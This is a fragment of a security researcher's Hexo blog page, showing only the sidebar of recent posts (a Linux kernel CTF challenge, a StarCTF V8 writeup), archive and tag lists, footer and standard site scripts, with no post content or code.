                        <a class="has-link-grey -link" href="/categories/Browser-Explore/">Browser Explore</a> / <a class="has-link-grey -link" href="/categories/Browser-Explore/optimize/">optimize</a>
                    </p>
                </div>
            </div>
        </article>
        
        <article class="media">
            
            <a href="/2019/05/30/Linux Kernel 初探/" class="media-left">
                <p class="image is-64x64">
                    <img class="thumbnail" src="https://p1umer-1256667851.cos.ap-beijing.myqcloud.com/img/PeruvianRainforest_ZH-CN4066508593_1920x1080.jpg" alt="Linux Kernel 初探（一）BabyKernel">
                </p>
            </a>
            
            <div class="media-content">
                <div class="content">
                    <div><time class="has-text-grey is-size-7 is-uppercase" datetime="2019-05-30T14:04:29.000Z">2019-05-30</time></div>
                    <a href="/2019/05/30/Linux Kernel 初探/" class="has-link-black-ter is-size-6">Linux Kernel 初探（一）BabyKernel</a>
                    <p class="is-size-7 is-uppercase">
                        <a class="has-link-grey -link" href="/categories/Linux-Kernel/">Linux Kernel</a>
                    </p>
                </div>
            </div>
        </article>
        
        <article class="media">
            
            <a href="/2019/05/06/Star-CTF-OOB-writeup/" class="media-left">
                <p class="image is-64x64">
                    <img class="thumbnail" src="https://p1umer-1256667851.cos.ap-beijing.myqcloud.com/img/TreeFrog_ZH-CN9016355758_1920x1080.jpg" alt="StarCTF OOB writeup">
                </p>
            </a>
            
            <div class="media-content">
                <div class="content">
                    <div><time class="has-text-grey is-size-7 is-uppercase" datetime="2019-05-06T14:04:29.000Z">2019-05-06</time></div>
                    <a href="/2019/05/06/Star-CTF-OOB-writeup/" class="has-link-black-ter is-size-6">StarCTF OOB writeup</a>
                    <p class="is-size-7 is-uppercase">
                        <a class="has-link-grey -link" href="/categories/Browser-Explore/">Browser Explore</a> / <a class="has-link-grey -link" href="/categories/Browser-Explore/Exploit/">Exploit</a>
                    </p>
                </div>
            </div>
        </article>
        
    </div>
</div>

    
        <div class="card widget">
    <div class="card-content">
        <div class="menu">
        <h3 class="menu-label">
            Archives
        </h3>
        <ul class="menu-list">
        
        <li>
            <a class="level is-marginless" href="/archives/2019/08/">
                <span class="level-start">
                    <span class="level-item">August 2019</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">1</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2019/07/">
                <span class="level-start">
                    <span class="level-item">July 2019</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">2</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2019/05/">
                <span class="level-start">
                    <span class="level-item">May 2019</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">2</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2019/03/">
                <span class="level-start">
                    <span class="level-item">March 2019</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">1</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2019/02/">
                <span class="level-start">
                    <span class="level-item">February 2019</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">1</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2018/09/">
                <span class="level-start">
                    <span class="level-item">September 2018</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">1</span>
                </span>
            </a>
        </li>
        
        <li>
            <a class="level is-marginless" href="/archives/2018/07/">
                <span class="level-start">
                    <span class="level-item">July 2018</span>
                </span>
                <span class="level-end">
                    <span class="level-item tag">2</span>
                </span>
            </a>
        </li>
        
        </ul>
        </div>
    </div>
</div>
    
        <div class="card widget">
    <div class="card-content">
        <div class="menu">
            <h3 class="menu-label">
                Tags
            </h3>
            <div class="field is-grouped is-grouped-multiline">
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/Basic/">
                        <span class="tag">Basic</span>
                        <span class="tag is-grey">3</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/Browser-Explore/">
                        <span class="tag">Browser Explore</span>
                        <span class="tag is-grey">7</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/Exploit/">
                        <span class="tag">Exploit</span>
                        <span class="tag is-grey">2</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/Fuzz/">
                        <span class="tag">Fuzz</span>
                        <span class="tag is-grey">2</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/Kernel/">
                        <span class="tag">Kernel</span>
                        <span class="tag is-grey">1</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/V8/">
                        <span class="tag">V8</span>
                        <span class="tag is-grey">4</span>
                    </a>
                </div>
                
                <div class="control">
                    <a class="tags has-addons" href="/tags/optimize/">
                        <span class="tag">optimize</span>
                        <span class="tag is-grey">2</span>
                    </a>
                </div>
                
            </div>
        </div>
    </div>
</div>
    
    
</div>

            </div>
        </div>
    </section>
    <footer class="footer">
    <div class="container">
        <div class="level">
            <div class="level-start has-text-centered-mobile">
                <a class="footer-logo is-block has-mb-6" href="/">
                
                    <img src="/images/111.png" alt="Linux Kernel 初探（一）BabyKernel" height="28">
                
                </a>
                <p class="is-size-7">
                &copy; 2019 P1umer sauce&nbsp;
                Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> & <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank">Icarus</a>
                
                </p>
            </div>
            <div class="level-end">
            
                <div class="field has-addons is-flex-center-mobile has-mt-5-mobile is-flex-wrap is-flex-middle">
                
                
                <p class="control">
                    <a class="button is-white is-large" target="_blank" title="Creative Commons" href="https://creativecommons.org/">
                        
                        <i class="fab fa-creative-commons"></i>
                        
                    </a>
                </p>
                
                <p class="control">
                    <a class="button is-white is-large" target="_blank" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/">
                        
                        <i class="fab fa-creative-commons-by"></i>
                        
                    </a>
                </p>
                
                <p class="control">
                    <a class="button is-white is-large" target="_blank" title="Download on GitHub" href="https://github.com/ppoffice/hexo-theme-icarus">
                        
                        <i class="fab fa-github"></i>
                        
                    </a>
                </p>
                
                </div>
            
            </div>
        </div>
    </div>
</footer>
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script>
<script>moment.locale("en");</script>


    
    
    
    <script src="/js/animation.js"></script>
    

    
    
    
    <script src="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/js/lightgallery.min.js" defer></script>
    <script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js" defer></script>
    <script src="/js/gallery.js" defer></script>
    

    
    

<div id="outdated">
    <h6>Your browser is out-of-date!</h6>
    <p>Update your browser to view this website correctly. <a id="btnUpdateBrowser" href="http://outdatedbrowser.com/">Update
            my browser now </a></p>
    <p class="last"><a href="#" id="btnCloseUpdateBrowser" title="Close">&times;</a></p>
</div>
<script src="https://cdn.jsdelivr.net/npm/outdatedbrowser@1.1.5/outdatedbrowser/outdatedbrowser.min.js" defer></script>
<script>
    document.addEventListener("DOMContentLoaded", function () {
        outdatedBrowser({
            bgColor: '#f25648',
            color: '#ffffff',
            lowerThan: 'flex'
        });
    });
</script>


    
    
<script src="https://cdn.jsdelivr.net/npm/mathjax@2.7.5/unpacked/MathJax.js?config=TeX-MML-AM_CHTML" defer></script>
<script>
document.addEventListener('DOMContentLoaded', function () {
    MathJax.Hub.Config({
        'HTML-CSS': {
            matchFontHeight: false
        },
        SVG: {
            matchFontHeight: false
        },
        CommonHTML: {
            matchFontHeight: false
        },
        tex2jax: {
            inlineMath: [
                ['$','$'],
                ['\\(','\\)']
            ]
        }
    });
});
</script>

    
    

<a id="back-to-top" title="Back to Top" href="javascript:;">
    <i class="fas fa-chevron-up"></i>
</a>
<script src="/js/back-to-top.js" defer></script>


    
    

    
    
    
    

    
    
    
    
    
    <script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script>
    <script src="/js/clipboard.js" defer></script>
    

    
    
    


<script src="/js/main.js" defer></script>

    
    <div class="searchbox ins-search">
    <div class="searchbox-container ins-search-container">
        <div class="searchbox-input-wrapper">
            <input type="text" class="searchbox-input ins-search-input" placeholder="Type something...">
            <span class="searchbox-close ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="searchbox-result-wrapper ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
    (function (window) {
        var INSIGHT_CONFIG = {
            TRANSLATION: {
                POSTS: 'Posts',
                PAGES: 'Pages',
                CATEGORIES: 'Categories',
                TAGS: 'Tags',
                UNTITLED: '(Untitled)',
            },
            CONTENT_URL: '/content.json',
        };
        window.INSIGHT_CONFIG = INSIGHT_CONFIG;
    })(window);
</script>
<script src="/js/insight.js" defer></script>
<link rel="stylesheet" href="/css/search.css">
<link rel="stylesheet" href="/css/insight.css">
    
</body>
</html>